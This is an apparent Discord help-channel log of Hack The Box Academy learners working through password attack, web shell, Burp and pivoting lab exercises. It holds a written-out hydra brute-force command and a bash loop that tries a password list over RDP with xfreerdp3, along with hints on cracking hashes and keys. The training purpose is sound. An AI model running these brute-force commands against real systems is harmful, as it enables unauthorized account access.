Can anyone help me on password attacks,

Pass the hash

Using David's hash, perform a Pass the Hash attack to connect to the shared folder \DC01\david and read the file david.txt.
I have davids hash but i dont know how to connect to DC01, i tried using invoke-thehash, and i get permission denied.

queen ridge
#

I used the knowledge I had learned to find a website vulnerability 。。。then.。。what should i do now?

#

Where should I report this news? Or do I keep trying to exploit his vulnerabilities?

fathom pendant
pine dune
#

Hi guys for the password reuse/default passwords module does anyone have any clues they could give me pls?

queen ridge
#

oh~ thankyou

fathom pendant
queen ridge
#

open you files /usr/share/wordlists/dirbuster/

fathom pendant
pine dune
#

ill check it out @fathom pendant

#

thanks

fathom pendant
queen ridge
#

😩

pine dune
fathom pendant
pine dune
#

ahh ok cool

fathom pendant
#

Also you need to be connected to the host to try and connect

pine dune
#

u mean vpn?

#

i connect to mysql using mssql?

fathom pendant
#

No

#

I don't recall what that section asks you to do

pine dune
#

it asks us to get mysql creds

fathom pendant
fathom pendant
pine dune
#

my bad lool

lean kestrel
#

Hello
I need a small hint with this question: “Examine the target and find out the password of the user Will. Then, submit the password as the answer.” I already found Kira’s password; I checked the .mozilla folder and found a logins.json file with the encrypted password, but when I try using the 3 tools provided in the module, none of them work. What should I do?

pine dune
#

ill try be more specific next time

fathom pendant
fathom pendant
rustic sage
#

No fucking way hydra is still going

fathom pendant
rustic sage
fathom pendant
#

It should not take 2 hours

pine dune
fathom pendant
#

There's also other tools like netexec

pine dune
#

think its something wrong with htb

fathom pendant
pine dune
#

ohh mb

lean kestrel
fathom pendant
rustic sage
#

Password Attack hard lab

fathom pendant
#

Test*

rustic sage
#

Ok

#

But this is what I'm supposed to do for this module right?

median gale
#

Recommended wordlist?

#

Usernames from /xato-net-10-million-usernames.txt didnt do the trick

median gale
fathom pendant
median gale
fathom pendant
rustic sage
#

Only rpd

fathom pendant
rustic sage
#

Even tho it's been 2 hours?

fathom pendant
#

Rdp* and yes, it shouldn't take long

rustic sage
#

Aight

#

Thx I'll report back in idk 30 mins

lean kestrel
steady valve
#

im learning shells & payloads > bind shells, and im doing everything exactly as it tells me to do, but for some reason it just chooses not to work

#

i cant navigate anything, i cant change directories or execute commands

winter schooner
rustic sage
#

For speed? It's not giving me any error while on wifi

fathom pendant
#

... yeah

winter schooner
rustic sage
fathom pendant
rustic sage
fathom pendant
#

Oh cellular is typically worse

rustic sage
#

Hope it gives me something

rustic sage
#

Now it's going at the same speed as with wifi

#

I'm seeing the credentials being tried bc I did -vv

#

In the command

fathom pendant
#

¯_(ツ)_/¯

rustic sage
#

Is there anyone I can pay to help

fathom pendant
#

I legally cannot take money

rustic sage
#

Yes I asked if there's someone who can help me

ocean night
#

I'd be careful offering money for services

rustic sage
#

Do you know anyone who is good with these things and could help me solve this problem?

ocean night
#

You never know who may pick you up on it, and what they may do

rustic sage
#

Something

fathom pendant
#

Are you using the mutated list?

#

Gen q

rustic sage
#

And I'm still waiting for password attack module to be finished. There must be something wrong with my laptop or my connection or something bc everyone else is telling me hydra shouldn't ALWAYS take 2 hours + to finish

rustic sage
rustic sage
fathom pendant
fathom pendant
#

Also it wouldn't have anything to do with your computer, just your connection

rustic sage
#

¯_(ツ)_/¯
Idk bro there must be something wrong, I can't keep waiting for someone to give me advice on discord

ocean night
#

I assume you've tried switching from UDP to TCP?

#

What is your ping to the VPN server?

rustic sage
#

I am using tcp

rustic sage
ocean night
#

Yes

#

Open a command prompt, and run ping <hostname of the VPN server, or IP of the target>

#

It's how long it takes for a packet to travel from your computer, over the internet and back again to a target.

rustic sage
#

Ping target ip

64 bytes from ip icmp_seq=10 ttl=127 time=146ms

ocean night
#

That's not too bad.. not great, but not terrible

#

Can you let it keep running? Do you get any dropped packets (packet loss)

rustic sage
#

No weird stuff

ocean night
#

Any missing numbers in the icmp_seq= field?

#

like icmp_seq=10 then after a bit icmp_seq=20 comes up

rustic sage
#

No it's 150 151 152

ocean night
#

If you CTRL+C out, it should show you any packet loss stats

rustic sage
#

177 packets sent 0% packet loss

ocean night
#

Ok, so it's not the network.. although 146 ping is not amazing, it's still ok

rustic sage
#

Ye

ocean night
#

Honestly I'm not familiar with the module you are doing, just wanted to check it wasn't a network issue

rustic sage
#

It's not just this module, all modules take this long while using hydra

#

It's past 3 hours now

fathom pendant
#

What's your general down/up speeds

ocean night
#

Bruteforcing can sometimes take a long time, but I thought Academy modules were made in such a way to avoid such long delays like that

fathom pendant
#

Also i suggest resetting the target and starting a fresh attempt

rustic sage
fathom pendant
rustic sage
fathom pendant
#

I also suggest trying with the pwnbox instead

rustic sage
#

But what's weird is that John takes very little time to crack something so it's prob not the laptop

ocean night
#

Are you running it in Verbose mode, to see if there is anything really odd going on? -v or -V option

fathom pendant
#

If you choose to test with the pwnbox you'll need to stop the vpn connection on your own machine

rustic sage
#

Download speed 21.23 upload 11.00

ocean night
#

..and I assume no weird warnings or anything

fathom pendant
rustic sage
fathom pendant
#

That's just slow network speeds

ocean night
#

Oh my god

#

how big is your password list

#

wc -l <list name>

rustic sage
fathom pendant
#

It should be the top of the mutated list btw

#

You can likely guess it faster at this point

rustic sage
rustic sage
fathom pendant
rustic sage
fathom pendant
#

Yeah it's before that

rustic sage
#

Tf I used -f in the command

#

Download 88.52 upload 20.18

rustic sage
fathom pendant
#

Also try another remote service then

rustic sage
#

Did I do anything wrong? I was told to use -f flag

fathom pendant
#

||winrm||

rustic sage
#

Hydra -l Johanna -P mutatedpass.list service://ip -f -t 34 -vv

#

This command is okay?

fathom pendant
#

It should

#

Though I used netexec for this instead

rustic sage
#

Unknown service

#

With hydra

fathom pendant
#

I don't recall if hydra supports winrm

rustic sage
#

Lemme try something else

rustic sage
fathom pendant
rustic sage
fathom pendant
#

You can also pipe to grep to filter out the '[-]'

#

And just wait a minute for it to get the result

rustic sage
fathom pendant
#

Look at the results you had from the other command and use your brain

#

grep -v 'pattern' is an inverse grep

rustic sage
#

Just the list of wrong passwords?

fathom pendant
#

Meaning it will show every line that doesnt contain the pattern

#

Netexec is preferred, since that's still being maintained

rustic sage
fathom pendant
#

Yes

#

You don't need to find multiple creds

rustic sage
#

I'll wait 30 minutes if it's still not finding it I'll close everything and look for an indian guy on fiver

#

Shits beyond ridiculous

#

What

#

Why u angry

fathom pendant
rustic sage
#

I do lack in skills

#

This is why I'm here

fathom pendant
#

i shouldn't have had to point you to the fact multiple different remote services that exist ¯_(ツ)_/¯

rustic sage
#

Hydra or crackmapexec or whatever just runs and doesn't stop

#

Sometimes it finds it but it might 2/3 hours

fathom pendant
#

It shouldn't but you also have 20Mb internet so it may take a bit longer, but I can tell you that the pw is earlier

rustic sage
#

If netexec works do I need to use hydra for other stuff?

#

Like in general to brute force stuff

#

Is there any particular cases where you need hydra specifically?

#

Fuck me it worked

#

@fathom pendant thank you marcielee

#

Sometimes your unnecessarily sarcastic but you know your shit thx

#

Idk I'm having hella problems with hydra, if you can use netexec for everything I don't think I'll ever use hydra again

#

At least it works😭

fathom pendant
quasi wave
#

I'm doing the Linux Credential hunting section of password attacks module. I am logged in as Kira. I have found a zip file that I think has the password I am looking for for the other user but I don't have permission to open it. How do I bypass the permissions and open the file?

#

or unzip the file rather?

cerulean hinge
#

Hello, it may be a dumb question but I'm stuck on the module "Attacking Common Services" at the FTP part.
My nmap scan doesn't return any result even with -p- for all port. Tried various way to bypass it but didn't worked really well. I finally found the port but after that I can't do anything (no anonymous session, no brute force using the provided list...). Am I dumb ?

fathom pendant
#

Look at the methods described in the section

#

The zip file is for another section

quasi wave
#

ok thanks

#

I also saw the shadow file for will in Will's folder

#

I know there's a shadow file in will's folder but I'm having trouble figuring out how to read it

#

reason is I am trying the different things in the section and its not working

#

can someone give me a hint? I've tried a bunch of techniques from the section

#

I am trying to download lazagne onto the target host and use that as a last resort but the target is not on internet

analog dock
#

At least that’s how you’d read etc shadow

quasi wave
#

ya but if I cat it it says permission denied

quasi wave
analog dock
#

I don’t remember it top of my head, but usually just follow the section and replicate in exercise

#

Don’t divert too much

fallen merlin
#

can someone help me with burp really quick?

#

i am trying to edit a response, but unable to edit the response... can't change anything, it doesnt let me type

#

intercepted the request, sent to repeater, trying to edit the response to resend but cant change at all

fathom pendant
fallen merlin
#

how can I change the html? I need to enable a button that is currently disabled, i see it disabled in the html

fathom pendant
#

You can turn on response interception in settings

#

You'd need to hard refresh [ctrl+shift+r] the page for it to capture it

fallen merlin
#

<body>
<form name='getflag' class='form' method='post' id='form1'>
<button class='btn block-cube block-cube-hover' id='submit' type='submit' formmethod='post' name='getflag' value='true' disabled>

#

there's a disable in the html, but not sure how can i change it using the request only

fathom pendant
#

You're not

#

There's an option to intercept the response and edit it

#

Then have that send

fallen merlin
#

i cant send screenshots here :/

fathom pendant
#

Because your account isn't linked. Or something is wrong with the identifier and you'll have to have a mod help

fallen merlin
#

got it, how can i link my account

#

wait, i see it

fathom pendant
#

The button in the account page doesn't do anything

dapper moth
fathom pendant
#

Which I'm assuming they're working on

dapper moth
#

Some people will come to the channel and ask stuff that could be related to some module but might not be going through the material

fathom pendant
fallen merlin
#

I am reading guys

#

but it's kind of complicate when it's in a different language that is not yours lol

#

and i just started, if that bothers im sorry

quasi wave
#

hi I found the authorized keys file and the id_rsa file

#

am I supposed to crack those?

fathom pendant
#

Do what you think

shut wraith
#

where can I find recommended boxes for modules I completed ?

#

nvm u just click on dashboard on the completed module

fallen merlin
#

testing

light cove
#

So in regards to the web proxy module, in the ZAP Scanner section towards the end, the lesson seems super straight forward (albeit it a bit out of date).

It was mentioned to me that the ZAP Hud isn't needed, and so after trying both with and without using ZAP HUD. It still seems like there's no high level vuln detected after doing an active scan.

Tried it a couple times, But no dice. Has anyone else run into this/had similar issues? Or am I missing something really obvious.

Seems like a really simple lab, so it's curious why the scan isn't revealing the high level vuln mentioned in the instructions

fathom pendant
#

@supple meteor be careful with spoiling anything from the AEN module, also sometimes when you've added a user to a group, you'd need to log out and back in.

fathom pendant
rustic sage
#

Why does it say no hashes loaded

fathom pendant
#

you can also have it start from a potentially vulnerable endpoint

fathom pendant
#

"salt-value exception"

#

it tells you just above the "no hashes loaded" message

#

so something about your hashfile isn't formatted properly

supple meteor
#

sorry, but I supposed that's different host ?

cerulean hinge
# rustic sage Why does it say no hashes loaded

If I'm not mistaking in the .hash file generated by john you have few information that hashcat doesn't recognize this is why it doesn't works. With john it should works. Else you need to extract the part of the .hash file that hashcat can process

fathom pendant
#

but i don't recall needing to add any user to a group tbh

light cove
fathom pendant
light cove
fathom pendant
#

and you can just start from that point and not crawl the full thing, which will have it take a LONG time

supple meteor
#

logged out and back, still get denied
Or I supposed to do dynamic port forwarding (:8081, via SSH) rather than chisel (:1080)

fathom pendant
#

idk i used ligolo-ng for my proxy/agents ¯_(ツ)_/¯

supple meteor
#

lol it's time for another tool
i'll give it a try, thanks

fathom pendant
#

ligolo is a 10/10 tool; though it works BEST if you run it with root :)

light cove
# fathom pendant and you can just start from that point and not crawl the full thing, which will ...

so maybe something is off, because even starting at the root here (i.e. <SERVER_IP>:<PORT>) for the target is still giving really quite speedy scans in about ~1 minute or so here. The Active Scan runs fasters

Spider, AJAX Spider, and Active Scan's all running very quick,
And generated report doesn't seem to indicate any presence of high vulnerability issues.

Maybe I'm just doing something weird, Idk. But been looking at this for a while

fathom pendant
#

there's a specific spider scan you gotta do

#

but it should not take <1 min to complete

light cove
#

Hm... I'll check it out again tomorrow here; gotta go get ready for work in the am 🙃

#

I appreciate the help nonetheless

rustic sage
#

please some one help i not able to send messeges in the #general group

#

is there somebody that can help me

rustic sage
#

i loged in

#

but what what to do next i am on the first step

#

what is account identifier

#

In password attack hard lab what am I supposed to do with the vhd file?

cloud urchin
#

try googling the file type

rustic sage
#

Its a virtual disk but on the forum people are talking abt using John, I tried to use bitlocker2john and the John on the file outputted by bitlocker2john but it can't find a password @cloud urchin

#

I used mutated list

toxic fern
#

hi, if there is a better place to ask this, please let me know
I am almost at the very beginning of the hack the box academy stuff. I haven't done this in about a year, so I'm quite rusty on how everything works.
I am trying to ssh into the learning environment using openvpn.
I run sudo openvpn academy-regular.ovpn , and in a different tab ssh htb-student@<ip of learning environment>. but it gives the no route to host error, and I'm really not sure what the problem is because this is like super basic stuff and all of google seems to think its so easy. any ideas of what I could be doing wrong?

fathom pendant
#

Did you start target?

toxic fern
fathom pendant
#

ip a

#

Is that wsl?

toxic fern
#

ngl I don't know what that means

fathom pendant
#

Windows Subsystem for Linux

toxic fern
#

oh no its actually linux

#

anyways what does ip a mean

fathom pendant
#

Run that command

#

Is what that means

#

I also suggest downloading a new vpn file

toxic fern
fathom pendant
#

if you get a bunch of tun0/1/2/3/4... then you need to sudo killall openvpn then run the openvpn command again

toxic fern
#

oh

#

yeah it looks like thats what I'm getting

fathom pendant
#

yeah because you didn't kill the old vpn when running the new one

#

so you're getting a bunch of routing colissions

toxic fern
#

that makes so much sense

#

aaaand it worked 😂 thanks bro

fathom pendant
#

basic networking, if you have multiple interfaces on a device all leading to the same point -- boom colissions

finite violet
#

will the target machines self desctruct when i mark a module completed, or should i terminate them before moving on

toxic fern
cloud urchin
fathom pendant
#

so you're not just leaving a bunch of machines on

rustic sage
#

The nano command shows me exactly the same output as cat command for backup.hash

#

Idk why john isn't working

cloud urchin
cloud urchin
rustic sage
#

I need to sleep

#

Lemme see

soft urchin
#

Hi

pine dune
cloud urchin
#

or simply the built-in windows snip tool.

pine dune
#

Yeah i use win shift s to take screenshots

finite violet
#

a little confusion. the questions in some of the modules have nothing to do with what was covered in the module. what gives with that?
for instance i'm being asked "how many total packages are installed on the system" a method in which to do that was never described, and the answer from how i would get it is deemed incorrect

fathom pendant
finite violet
#

eh the module was about file descriptors and STDIN/STDOUT. i was able to answer the question using dpkg-query

fathom pendant
#

/feedback in the discord, or after you finish you can review the module

sleek needle
#

Hello guys, I need a small help.
So I am doing Skill Assessment - File Upload Attacks. In that I successfully upload the web shell file, but then when I search for the file in the submissions directory I don’t find it. Does the name of the file change, and how do I get to know it?

fathom pendant
cloud urchin
sleek needle
#

Okay, thank you so much

finite violet
#

What is the Type of the service of the "dconf.service"?

#

dconf.service does not exist in the target machine

normal sand
#

Module: Documenting and Reporting

I can't extract the downloaded sample report from resources. Is anyone else facing the same issue?

fathom pendant
#

It's pw protected

normal sand
elder crow
#

Does anyone have any hints for http attacks module and section: Exploitation of Request Smuggling?

fading nest
#

guys i have a question, I wanna get started with cybersecurity, but this seems like such a wide and broad industry, I don't even know where to start. I've started by doing the Information Security Path from HTB Academy but I feel like doing modules from the HTB Labs is much better because you get to do on hands stuff, what do you guys think?

autumn pilot
#

HTB Academy and HTB Labs are completely different

#

HTB Academy - theory, examples, exercises
HTB Labs - machines/challenges, no theory, no examples, e.g., figure it on your own

worthy mantle
#

Hi

#

I wanna start my hacking journey with htb what do you think guys? Can I learn hacking with htb?

acoustic owl
#

sure

rustic sage
#

Hey guys, I need some help. Im currently doing ffuf module, and I need to run a parameter fuzzing. But because the site I need to fuzz is private, I can't connect to it, I already added DNS entry but It still doesn't load on my virtual machine, so I went to pwnbox but there the whole internet is not working

acoustic owl
rustic sage
acoustic owl
#

This is not the Target Website 😉
This is the Academy Website

rustic sage
#

I know, I just wanted to check if it works, or I don't need access to internet to complete this?

acoustic owl
#

You don't need access to the internet from the PwnBox

rustic sage
#

Also I can't install ffuf because of this

urban elk
#

worked for me just now, try again ?

acoustic owl
#

If ffuf is not installed on the PwnBox, you will need to contact support or use your own VM.

urban elk
#

ah, subscription status maybe ?

acoustic owl
#

if you have a subscription, your PwnBox should have an internet connection

midnight galleon
#

what is the intended solution for the last flag on the skill assessemnt of pivoting?

#

I found it on a share on the last workstation, not the DC

acoustic owl
#

But this share is from the DC, right?

midnight galleon
#

but no pivoting is required to access it

acoustic owl
#

Yes, I remember. I was surprised too.

visual umbra
rustic sage
#

I will contact support then I guess

lyric quiver
#

Hi

#

Is someone able to help me on : Linux Privilege Escalation - Docker please ?

#

Thank by advance 🙂

golden zealot
#

Hello ! anyone that pwned "Certified" machine ? I just need a lil hint

golden zealot
#

thanks

fathom apex
#

probably this could help someone in future..
i'm having an issue with network service section of password attacks module. hydra is not finding the rdp password, even after multiple attempts.
I have the right username from enumeration from previous access.
Upon multiple resets of target machine, it worked only once via the pwnbox, but has never worked from my own machine with the VPN.

As a workaround, I wrote a simple bash script which works for this section. It could help someone else stuck with same issue.
however, wouldn't recommend this for normal use.. works for this particular section since it has only around 200 passwords in the given resource file.

for line in $(cat password.list); do xfreerdp3 /v:<target-ip> /u:<user> /p:$line /log-level:OFF; echo "trying $line"; done

urban elk
#

easier if you just post your question

lyric quiver
#

Well it would just spam having a discussion here

winter schooner
viral snow
#

I'm starting the Active Directory penetration testing job role path next week. Curious to know if there's going to be a room available like CBBH, and CPTS.

gray yacht
eternal vigil
#

mine got solved i was doing just a dumb mistake where i already had a nc session open in another rdp session and that was pulling all my connections

#

what are you having trouble with ? like what command are you running ?

winter schooner
#

and i only have 1 nc session

eternal vigil
#

can you show your commands ?